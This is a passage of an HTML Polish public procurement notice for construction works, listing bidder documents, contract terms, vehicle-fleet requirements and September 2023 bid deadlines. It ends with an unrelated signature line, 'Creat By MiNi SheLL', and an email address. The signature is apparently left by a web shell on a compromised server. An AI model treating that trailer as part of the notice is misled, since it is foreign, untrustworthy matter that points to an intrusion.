wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na<br/>zdolnościach tych z nich, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do oferty<br/>oświadczenie, z którego będzie wynikało, które roboty budowlane wykonają poszczególni Wykonawcy (zgodnie z Załącznikiem nr 3 do SWZ dla każdego Zadania). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi Wykonawcami, ww. wykaz dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>W przypadku składania oferty wspólnej, ww. dokumenty składają Wykonawcy łącznie. Wykonawca przedkłada ww. wykaz<br/>przygotowany na podstawie wzoru przekazanego przez Zamawiającego wraz z wezwaniem do jego złożenia.<br/>2. wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>W przypadku składania oferty wspólnej, ww. wykaz składają Wykonawcy łącznie.<br/>Wykonawca przedkłada ww. wykaz przygotowany na podstawie wzoru przekazanego przez Zamawiającego wraz z wezwaniem do<br/>jego złożenia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie określa w postępowaniu żadnych przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty – wypełniony zgodnie z Załącznikiem nr 1 do SWZ.<br/>2. Formularz cenowy - wypełniony zgodnie z Załącznikiem nr 2 do SWZ.<br/>3. Informacja o Wykonawcach wspólnie ubiegających się o udzielenie zamówienia – wraz z oświadczeniem składanym na<br/>podstawie art.117 ust.4 ustawy - wypełniona zgodnie z Załącznikiem nr 3 do SWZ. UWAGA! Wymagana wyłącznie w<br/>przypadku składania oferty wspólnej (np. konsorcja, spółki cywilne)!<br/>4. Oświadczenia o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu – wypełnione zgodnie z<br/>Załącznikami nr 4 i 5 do SWZ.<br/>5. Oświadczenie podmiotu udostępniającego zasoby, na których polega Wykonawca w postępowaniu o udzielenie<br/>zamówienia – wypełnione zgodnie z Załącznikiem nr 6 do SWZ.<br/>UWAGA! Wymagane wyłącznie w przypadku polegania na zasobach podmiotu/podmiotów je udostępniającego/ych!<br/>6. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy (jeżeli w imieniu<br/>Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów rejestrowych<br/>Wykonawcy).<br/>7. Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby, do oddania do dyspozycji Wykonawcy niezbędnych<br/>zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (o ile Wykonawca korzysta ze zdolności<br/>innych podmiotów na zasadach określonych w art. 118 ustawy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z postanowieniami zawartymi w Części IV. SWZ - Przygotowanie i składanie ofert, pkt 3 - Oferty wspólne <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Warunki umowy na realizację niniejszego przedmiotu zamówienia zawarte są w Załącznikach nr 7 do SWZ dla każdego Zadania (projekt umowy).<br/>2. Zamawiający przewiduje możliwość dokonania zmian postanowień umowy. Zakres, rodzaj zmian i warunki ich wprowadzenia określone zostały w § 17 projektów umów stanowiących Załączniki nr 7 do SWZ (dla Zadania I i II). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-08 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://konin.logintrade.net/zapytania_email,137553,aad259f3513ecb3d5a712817985257e2.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-08 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wymaga zabezpieczenia należytego wykonania umowy w wysokości 5% ceny całkowitej podanej w ofercie -<br/>dla Zadania I i Zadania II.<br/>2. Wykonawca ma obowiązek zapewnienia, przez pełen okres realizacji zamówienia, łącznego udziału pojazdów<br/>elektrycznych lub pojazdów napędzanych gazem ziemnym we flocie pojazdów samochodowych używanych przy<br/>wykonywaniu niniejszego zamówienia, zgodnie z art. 68 ust. 3 ustawy z dnia 11 stycznia 2018 r. o elektromobilności i<br/>paliwach alternatywnych. Na dzień ogłoszenia postępowania udział ten wynosi co najmniej 10 %.<br/>3. Zamawiający wykluczy z postępowania Wykonawcę na postawie art. 7 ust. 1 ustawy z dnia z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com